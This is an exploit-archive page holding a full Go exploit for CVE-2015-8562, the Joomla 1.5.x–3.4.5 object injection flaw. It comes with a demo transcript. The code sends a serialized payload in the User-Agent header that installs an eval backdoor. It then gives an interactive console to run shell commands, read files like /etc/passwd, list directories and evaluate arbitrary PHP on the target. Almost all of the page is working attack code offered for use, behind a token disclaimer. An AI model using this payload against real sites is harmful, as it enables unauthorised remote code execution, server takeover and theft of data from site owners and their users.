Joomla 3.4.5 Object Injection



EKU-ID: 5327 CVE: 2015-8562 OSVDB-ID:
Author: Khashayar Fereidani Published: 2016-01-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


package main

/*
**************************************************************************
* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit
* Exploit Author: Khashayar Fereidani ( http://fereidani.com )
* Version: 1.5.x to 3.4.5
* CVE : CVE-2015-8562
**************************************************************************
* THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE
*                     IS ON YOUR OWN RESPONSIBILITY
**************************************************************************
* How to run : (you need golang compiler from golang.org)
* go run exploit.go http://target/path
* or
* go build exploit.go
* ./exploit http://target/path
**************************************************************************
* DEMO :

$ ./exploit 192.168.1.113/joomla
###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.x to 3.4.5
###############################################

Attacking to  http://FILTERED.TLD/joomla/
Target is vulnerable !
# Command Line Documentation :
read FILEPATH			read file from FILEPATH
dir DIRPATH			list directory in DIRPATH
exec COMMAND			execute system command
eval phpcode			evaluate PHP Code
help				display this help
exit				close exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')


root@joomla:$ exec uname -a
Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@joomla:$

 */

import (
	"fmt"
	"net/http"
	"regexp"
	"os"
	"io/ioutil"
	"bytes"
	"net/http/cookiejar"
	"net/url"
	"bufio"
	"strings"
)


var target string;


var helpString=`# Command Line Documentation :
read FILEPATH			read file from FILEPATH
dir DIRPATH			list directory in DIRPATH
exec COMMAND			execute system command
eval phpcode			evaluate PHP Code
help				display this help
exit				close exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')

`

var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://")

var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)")

var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)")

var newLine=regexp.MustCompile("[\\n\\r]")

var client *http.Client

func newRequest(command string) *http.Request{
	values:=url.Values{}
	values.Set("1","echo('iMH3r3=');"+command+";")

	req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))

	if err!=nil{
		panic(err)
	}

	req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	return req
}


func escape(str string) string{
	return strings.Replace(str,"'","\\'",-1)
}


func runCommand(command string){
	res,err:=client.Do(newRequest(command))

	if err!=nil{
		fmt.Println(err.Error())
	}else{
		defer res.Body.Close()
		resBytes,err:=ioutil.ReadAll(res.Body)
		str:=string(resBytes)

		if err!=nil{
			fmt.Println(err)
		}
		match:=resultRegex.FindStringSubmatch(str)
		if len(match)>0{
			fmt.Print(match[0][7:])
		}
	}

}


func confirm() bool{
	res,err:=client.Do(newRequest(""))

	if err!=nil{
		fmt.Println(err)
		return false
	}else{
		if res.StatusCode==500{
			fmt.Println("Patched PHP Version :( !")
			return false
		}
		defer res.Body.Close()
		resBytes,err:=ioutil.ReadAll(res.Body)
		str:=string(resBytes)

		if err!=nil{
			fmt.Println(err)
		}
		match:=resultRegex.FindStringSubmatch(str)
		if len(match)>0{
			return true
		}else{
			return false
		}
	}
}

func main(){
	fmt.Print(`###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.0 to 3.4.5
###############################################
`)
	options := cookiejar.Options{}

	jar, err := cookiejar.New(&options)
	if err != nil {
		panic(err)
	}

	client = &http.Client{
		Jar:jar,
	}



	if len(os.Args)<2{
		fmt.Println("Insufficient input , please run ./exploit http://targeturl/path/")
		return
	}

	target=os.Args[1]
	if(!validHttpUrl.MatchString(target)){
		target="http://"+target
	}

	if string(target[len(target)-1])!="/"{
		target+="/"
	}

	fmt.Println("Attacking to ",target)


	res,err:=client.Do(newRequest(""))
	if err!=nil{
		fmt.Println("Request Error:",err)
		return
	}
	ioutil.ReadAll(res.Body)
	res.Body.Close()

	if confirm(){
		fmt.Println("Target is vulnerable !")
		//runCommand("system('ls -la')")
		stdinreader := bufio.NewReader(os.Stdin)

		fmt.Println(helpString)
		for {
			var line string
			fmt.Print("root@joomla:$ ")
			line,_=stdinreader.ReadString('\n')
			line=newLine.ReplaceAllString(line,"")
			match:=cmdRegex.FindStringSubmatch(line)
			if len(match)<3 {
				if (line=="exit"){
					return
				}

				if !(line=="help"){
					fmt.Println("Wrong input !")
				}

				fmt.Println(helpString)
			}else{
				cmd:=match[1]
				input:=escape(match[2])
				switch cmd {
				case "exec":
					runCommand("system('"+input+"')")
				case "read":
					runCommand("readfile('"+input+"')")
				case "dir":
					runCommand("$a=scandir('"+input+"');foreach($a as $v){echo $v.\"\\n\";}")
				case "eval":
					runCommand(match[2])
				}
			}
		}
	}else{
		fmt.Println("Target is not vulnerable!")
	}


}